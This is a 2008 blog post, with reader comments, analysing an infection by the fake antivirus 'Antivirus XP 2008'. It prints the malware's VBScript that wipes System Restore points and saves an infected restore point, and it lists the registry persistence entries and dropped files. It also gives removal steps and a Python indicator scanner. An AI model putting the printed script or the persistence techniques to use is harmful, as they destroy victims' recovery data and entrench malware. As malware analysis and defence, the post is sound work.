7th Sep '08

Antivirus XP 2008 Malware


I was on vacation last week and visiting some friends in Maine. Another friend named Jason was also visiting and was trying to fix the screen saver on a Windows XP computer. The screen saver that had been configured no longer worked, and the “Screen Saver” tab and “Desktop” tab were missing from the “Display Properties” control panel. I had never seen that before, and my best friend Don suggested simply rebooting. Jason rebooted the computer, but I didn’t pay attention as to whether this resolved the issue or not, as we were busy talking.

Today, back from vacation, I visited a malicious web site which replaced my desktop image with warnings that read “Warning! Spyware detected on your computer!”, “Warning! Win32/Adware.Virtumonde Detected on your computer”, “Warning! Win32/PrivacyRemover.M64 Detected on your computer”, “Danger!”, and “Please activate your antivirus software to Clean your computer”.

[Image: Antivirus XP 2008 desktop]

The “Screen Saver” and “Desktop” tabs were missing from the “Display Properties” control panel. Additionally, I was being prompted to click on a license agreement for an application named “Antivirus XP 2008 license agreement”. I noticed that the application was actually already running, even though I hadn’t executed it, downloaded it, or approved the execution of any ActiveX control.

[Image: Antivirus XP 2008 License Agreement]

I ended the task, but of course it was too late. The malware had embedded itself pretty solidly. One of the first things it had done was run the following VBScript to remove all of my previous Windows XP restore points:

' Disable System Restore on every drive ("" = all drives); this discards the existing restore points
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Disable("")
' Re-enable it so the machine once again has a (now empty) restore point store
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Enable("")
CONST DEVICE_DRIVER_INSTALL = 10
CONST BEGIN_SYSTEM_CHANGE = 100
' Create a new restore point that captures the already-infected system
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
' If the first attempt failed, wait ten seconds and try once more
If (errResults <> 0) then
 WScript.Sleep 10000
End if
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)

This disabled the Windows System Restore service and then enabled it again, clearing out any restore points. It then created a restore point named “Last good restore point”, which included the malware.

To run on reboot, the process created two separate registry entries:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name: lphcvdej0et2r
Value Data: C:\Windows\system32\lphcvdej0et2r.exe

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value Name: SVCHOST.EXE
Value Data: C:\Windows\system32\drivers\svchost.exe

The name of the process under HKLM is random, so your infection will have a different name. Besides the two executables above, it also created the following files:

C:\Windows\system32\drivers\tdssserv.sys
C:\Windows\system32\tdssserf.dll
C:\Windows\system32\tdssinit.dll
C:\Windows\system32\tdsslog.dll
C:\Windows\system32\tdssadw.dll
C:\Windows\system32\tdssmain.dll
C:\Windows\system32\tdssservers.dat
C:\Windows\system32\blphcvdej0et2r.scr

The malware apparently also sets your screensaver to the above .scr file, so that it can reinfect the machine if the other components are removed. To prevent the screen saver from being disabled and the desktop image from being changed back, the malware removed the “Screen Saver” and “Desktop” tabs from the “Display Properties” control panel. Today I realized that my friends in Maine were likely infected with a similar strain of this malware.

The malicious web site that I visited attempted to install through one of the following ways, until it was successful:

Java vulnerabilities - (Not vulnerable, I had just updated)
QuickTime Player vulnerabilities - (Not vulnerable, I had just updated)
Microsoft XML vulnerabilities - (Not vulnerable, old vulnerability)
Adobe Reader vulnerability - (VULNERABLE! I hadn’t updated)

Because I had failed to update Adobe Reader for the security vulnerability announced June 23, 2008, the malware executed without my ever being asked to allow it.

It’s very important that one keeps all browser plugins up to date, including the most popular ones above and Adobe Flash and Shockwave.

My Self-Removal Procedure

To repair the missing “Screen Saver” and “Desktop” tabs in Display Properties, I deleted the following registry sections:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system
HKCU\Software\Sysinternals

After doing that, I ensured that I didn’t have the malicious screensaver selected as my screen saver, fixed my desktop image, removed the additional malware files, and rebooted. After the reboot, I removed the registry entries that started the processes at startup, which now pointed to files that no longer existed. I also removed the registry entries that loaded the tdssserv.sys file as a driver. Then I did a thorough anti-virus scan. I recommend using Kaspersky or Avira.
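As an added illustration (not the author’s code or any product’s), here is a Python script that parses a constructed .reg-style export and flags the three kinds of change described in this post: an autorun value whose binary has a random-looking name, a value borrowing a system-process name but pointing outside system32, and the Policies\System values that hide the Display Properties tabs. The policy value names NoDispScrSavPage and NoDispBackgroundPage are the standard Windows names and are assumed here rather than taken from the post; the sample export is constructed, not a real capture.

```python
import re
from collections import defaultdict
# Constructed .reg-style export (sample data, not a real capture): the persistence entries and tab-hiding policies the post describes, plus one benign entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"lphcvdej0et2r"="C:\\Windows\\system32\\lphcvdej0et2r.exe"
"VMware Tools"="C:\\Program Files\\VMware\\VMwareTray.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SVCHOST.EXE"="C:\\Windows\\system32\\drivers\\svchost.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoDispScrSavPage"=dword:00000001
"NoDispBackgroundPage"=dword:00000001
"""
VALUE_RE = re.compile(r'^"([^"]+)"=(?:"(.*)"|dword:([0-9a-fA-F]{8}))$')
# Core Windows binaries that are only legitimate directly under system32.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
# Standard policy values that remove Display Properties tabs (names assumed, not from the post).
TAB_POLICIES = {"nodispscrsavpage": "Screen Saver", "nodispbackgroundpage": "Desktop"}
# Heuristic for machine-generated names: 10+ lowercase alphanumerics with at least two digits.
RANDOM_NAME_RE = re.compile(r"^(?=(?:.*\d){2})[a-z0-9]{10,}$")

def parse_reg(text):
    """Parse [key] headers and "name"=value lines into {key: {name: value}} (keys lowercased)."""
    tree, key = defaultdict(dict), None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif key and (m := VALUE_RE.match(line)):
            name, s, dword = m.groups()
            tree[key][name] = s.replace("\\\\", "\\") if s is not None else int(dword, 16)
    return tree

def scan(text):
    """Return one finding per indicator of the kind the post describes."""
    findings = []
    for key, values in parse_reg(text).items():
        if key.endswith(r"\currentversion\run"):
            for name, data in values.items():
                folder, _, exe = str(data).lower().rpartition("\\")
                if exe in SYSTEM_BINARIES and not folder.endswith(r"\windows\system32"):
                    findings.append(f"{name}: system binary name outside system32 ({data})")
                elif RANDOM_NAME_RE.match(exe.rsplit(".", 1)[0]):
                    findings.append(f"{name}: random-looking autorun binary ({data})")
        elif key.endswith(r"\policies\system"):
            for name, data in values.items():
                tab = TAB_POLICIES.get(name.lower())
                if tab and data == 1:
                    findings.append(f"{name}=1 hides the '{tab}' tab in Display Properties")
    return findings
```

Calling scan(SAMPLE_REG) reports the two autorun values and both policy values while leaving the benign VMware entry alone; on a live machine you would feed it the output of a reg export of the same keys.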

I briefly wrote about this malware in my previous blog article here. Whatever you do, don’t install the Antivirus XP 2008 software by choice, and definitely don’t believe that this software is an anti-virus program that is worthy of being paid for.

This infection was a very recent morph of this malware, and your infection may vary quite a bit. If left in place, this malware is capable of stealing your account information, including anything typed into an SSL-protected web site. Although I performed my own desktop restore after analyzing what changes had been made, you may not want to remove this on your own. Additionally, if you got to the point of actually installing this malware as an anti-virus product, you will have more steps to uninstall it. If you’re running Windows XP, you might consider running an application that lets you approve any changes to the registry and other critical system files, similar to Windows Vista’s built-in functionality.


6 Responses to “Antivirus XP 2008 Malware”

  1. hek says:

    Is there any way to get to a previous restore point after deleting the virus?

  2. Antivirus Expert says:

    I think XP antivirus showed how actually vulnerable and imperfect popular antivirus suites are. People bundle their computers with loads of security programs only to find out that XP antivirus feels just great in their protected systems. Self-proclaimed techies recommend installing half a dozen additional applications without giving any reasons except “this might help”. Somehow this makes me think that it’s much better to have protection AGAINST infection, rather than tools to cure XP antivirus. Not speaking about registry changes it can make; sometimes it just doesn’t make sense to remove the trojan because the system is already a mess.

  3. Mark Adams says:

    hek,

    Unfortunately not, unless you did a backup of your system to an external drive or something. I guess it’s possible that you could recover the restore point files using an “undelete” tool, but I haven’t tried.

    Your restore points are stored under “C:\System Volume Information” if you want to try.

  4. Keith Sloane says:

    I too have been infected. My attempts to cure have resulted in my machine refusing to boot up.
    I have put my hard drive in an old PC & on bootup it tells me I have a boot sector virus!!
    Help!

  5. Mark Adams says:

    Keith,

    Since your computer was booting before you attempted to cure it of the virus, I suspect it was your attempts that have caused it to become unbootable. What was the last thing that you did before it became unbootable?

  6. JohnGo says:

    Hello Keith,
    I had a similar experience. After several reboots with the malware starting and the fake BSOD, the PC wouldn’t boot anymore. I was able to get around this by booting from a Windows CD and going into recovery mode. Then use the “chkdsk c:” to repair the C drive.

    After the boot, I needed to do an F8 and start windows in safe mode. I was able to do a ctl-alt-del and get to task manager. Once there, I was able to kill off the malware process.

    I was then able to use AVIRA to scan and isolate the infected files. The bogus screensaver is still in place, and I too have the problem where the tab is now missing.
    The other item that will help is going into the Windows directory and renaming the bogus .scr file, so it can’t launch.

    Hope this helps,
    JohnGo
